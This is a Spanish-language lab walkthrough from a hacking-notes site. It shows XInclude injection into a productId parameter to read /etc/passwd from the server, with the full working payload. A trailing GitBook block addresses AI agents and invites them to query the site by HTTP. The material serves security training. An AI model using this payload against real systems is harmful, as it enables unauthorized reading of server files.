> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/es/web/xxe/file-reading-with-xinclude.md).

# Lectura de archivos con XInclude

### Aprovechando XInclude para recuperar archivos

El laboratorio tiene un **Comprobar stock** función que inserta la entrada proporcionada por el usuario en un documento XML del lado del servidor, y luego el análisis. No controlas todo el documento XML, por lo que es imposible definir una DTD para un XXE clásico.

Utilice **XInclude** para recuperar el contenido del **/etc/passwd** archivo inyectando una inclusión XInclude que será resuelta por el analizador del lado del servidor.

* Configuración enviada inicialmente: `productId=1&storeId=1`.

```php
productId=1&storeId=1
```

* Comprueba: el valor de `productId` se restablece y es analizado por el servidor. Por ejemplo `productId=test&storeId=1` se interpreta y se refleja.

```
productId=test&storeId=1
```

<figure><img src="/files/4b65ae17cd989cc7fd3d0964bdd60e757d940a51" alt=""><figcaption></figcaption></figure>

Inyección de una inclusión XInclude en `productId` para forzar la lectura de un archivo local.

```xml
<foo xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/></foo>
```

Ejemplo de parámetro enviado:

```xml
productId=<foo xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/></foo>&storeId=1
```

El analizador interpreta la inclusión XInclude e integra `/etc/passwd` contenido en el documento analizado — el valor proporcionado en `productId` se procesa y el archivo se lee.

<figure><img src="/files/058b6cca4ee08db829f94866aea4b7f715a67592" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/es/web/xxe/file-reading-with-xinclude.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
